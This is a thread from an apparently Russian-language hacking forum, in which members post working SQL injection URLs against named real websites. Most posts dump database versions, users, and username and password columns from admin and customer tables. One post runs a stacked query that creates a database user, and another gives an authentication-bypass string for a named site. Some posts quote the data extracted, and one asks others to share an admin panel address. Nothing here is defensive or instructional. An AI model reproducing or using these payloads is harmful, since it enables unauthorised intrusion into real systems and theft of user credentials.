SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    202
    Likes Received:
    277
    Reputations:
    32
    http://www.wavemovies.com/product.php?ID=-259+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x636174616c6f67+--
    Pr: 3
     
    2 people like this.
  2. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://www.vitek.ru/compare.php?all=-46%20union%20select%201,2,version(),4+--+
    ТИЦ450 PR5
     
    #13622 Фараон, 10 Mar 2011
    Last edited: 10 Mar 2011
    1 person likes this.
  3. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    202
    Likes Received:
    277
    Reputations:
    32
    http://windblowers.com/product.php?id=-73+union+select+1,2,3,4,group_concat(concat_ws(0x3a,ID,Username,Password,FName,LName,LastUpdate,AccessLevel)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+WBtblUser--+
    Pr: 4
     
    2 people like this.
  4. KoF31n

    KoF31n New Member

    Joined:
    29 Nov 2010
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    http://www.mtucizone.ru/list/index.htm?action=student&id=2286+and+1=0+union+select+1,2,group_c oncat(user(),0x3a,version(),database()),4,5,6,7,8,9,1 0,11,12,13--
    Version-5.0.90
    User-mtucizone@localhost
    Database-mtucizone
     
  5. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    слепая в датинге

    http://www.findme4love.net/Gallery.Search.html?Lady=5080+and%20substring%28version%28%29,1,1%29=5&Submit=FindMe
     
    1 person likes this.
  6. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.pchardware.ro/Reviews/review.php?id=-160+union+select+version%28%29--

    Code:
    http://www.worstpreviews.com/review.php?id=-115+union+select+group_concat%28column_name%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+information_schema.columns+where+table_schema=%27alexgi_worstreview%27+and+table_name=%27user_reviews%27
    Code:
    http://www.digital-storytime.com/review.php?id=70+order+by+57
    version :5.1.54
     
    #13626 bloodAngel, 10 Mar 2011
    Last edited: 10 Mar 2011
    1 person likes this.
  7. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Code:
    http://www.theanswerline.com/SubCategoryList.php?catid=-149+union+select+1,2,3,4,5,6,7,8,9,10,11--
    
     
  8. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Braun

    http://www.braun-mall.ru/?dep=news&newsid=-19%20and%201=2%20union%20select%201,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5,6--


    5.1.53-log fleyg@localhost braun-bl portbld-freebsd8.1

    http://www.braun-mall.ru/?dep=news&newsid=-19%20and%201=2%20union%20select%201,2,concat_ws(0x3a,c_login,c_passwd,c_email,c_company,c_fio,c_phone),4,5,6%20from%20ricsom_clients%20limit%201%20offset%201--
     
    1 person likes this.
  9. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    www.patagonianexpeditionrace.com PR-5

    Code:
    http://www.patagonianexpeditionrace.com/en/news_detail.php?news=-38+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13+--+
    Code:
    5.0.91-log:[email protected]:sitio
    wisdencricketer.com PR-6

    Code:
    http://wisdencricketer.com/item.php?parent_id=3&child_id=0&item_id=-419+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18+--+
    Code:
    5.0.77-log:ansonrobson.new@localhost:wisden
     
  10. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Code:
    http://www.minormania.com/feature.php?catid=757&id=-2132+union+select+1,2,3,4,5,6,7,8,9,10--
    
     
  11. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    citymagazine.rs
    PR 5
    Code:
    http://www.citymagazine.rs/page.php?cat=4 union select info() --

    4online.ru
    Rank 2
    Code:
    http://www.4online.ru/tv/?channel=-104 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7 --

    ilikeamericanmusic.com
    PR 3
    Code:
    http://www.ilikeamericanmusic.com/riff.php?EntryID=-1 union select 1,2,3,concat_ws(0x3a,user(),version(),database()) --

    aldwick.net
    PR 2
    Code:
    http://aldwick.net/directory.php?id=-3 UNION SELECT 1,group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
     
  12. Fild3y

    Fild3y New Member

    Joined:
    13 Feb 2011
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://passionfitnesswear.com/ShoppingOnlineViewProduct.php?id_set=-1+union+select+1,group_concat(User,0x3b,Pass),3,4,5,6,7,8,9,10+from+login
     
  13. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://www.displaysbyrioux.com/product.php?cat_id=-100+union+select+1,2,3,4,concat_ws(0x207c7c20,version(),user(),database()),6--

    http://www.schulmerichbells.com/category.php?cat_id=-100+union+select+1,2,3,4,concat_ws(0x3a3a3a,version(),user(),database()),6,7,8,9,10,11,12--

    http://www.southworth.com/page.php?id=9999999+union+select+concat_ws(0x3c666f6e7420636f6c6f723d27726564273e202d7c7c2d20,version(),user(),database())--
     
    #13633 asql, 12 Mar 2011
    Last edited: 12 Mar 2011
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.carriertransicoldeurope.com/ml/service/service.php?sites=32+and+1=(select+version()::int+from+pg_user)

    http://www.jr-takashimaya.com/pc/pinf110h.php?id=&pass=&Category_ID=8&flg=o&daikb=1;create+user+Pun!sh3r;

    http://www.kkt-sumai.jp/main/?category=8+and+1=(select+version()::int+from+pg_user)
     
    _________________________
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Code:
    http://platerfinancial.com/planning/
    обход авторизации (MySQL)

    username : ' or 1=1--+
    password : ' or 1=1--+
     
    _________________________
  16. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Code:
    http://www.powermate.com/air_compressors/products.php?cat_id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8--
    
    Version: 5.1.53-log
     
  17. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://www.hotta.ru/model.php?id=-881+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,version(),user(),database()),7,8,9,10,11,12,13,14--

    v.4
     
  18. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Code:
    http://www.hotelvictoriatrieste.com/hotel-Profile.html?id=-51+union+select+1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14,15+from+wnbo_users--
    
    5 ветка
     
  19. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://www.kinovdom.ru/catalog.php?catID=999999999999+union+select+concat_ws(0x3a3a3a,Login,Password)+from+logins+limit+0,1--

    Если кто зайдет в админку, отпишите плиз адрес (админки)

    http://www.bbkingblues.com/bio.php?id=-10+union+select+1,2,concat_ws(0x3a3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48--

    48! ыЫ. Кто больше?
     
    #13639 asql, 13 Mar 2011
    Last edited: 13 Mar 2011
  20. Fild3y

    Fild3y New Member

    Joined:
    13 Feb 2011
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://idm.com.np/newsdetail.php?id=-1+union+select+1,group_concat(username,0x3b,password),3,4,5,6+from+mytbladminlogin
    Code:
    http://www.leadacidbatteryinfo.org/newsdetail.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3b,password),10,11+from+tbladmin
     
Thread Status:
Not open for further replies.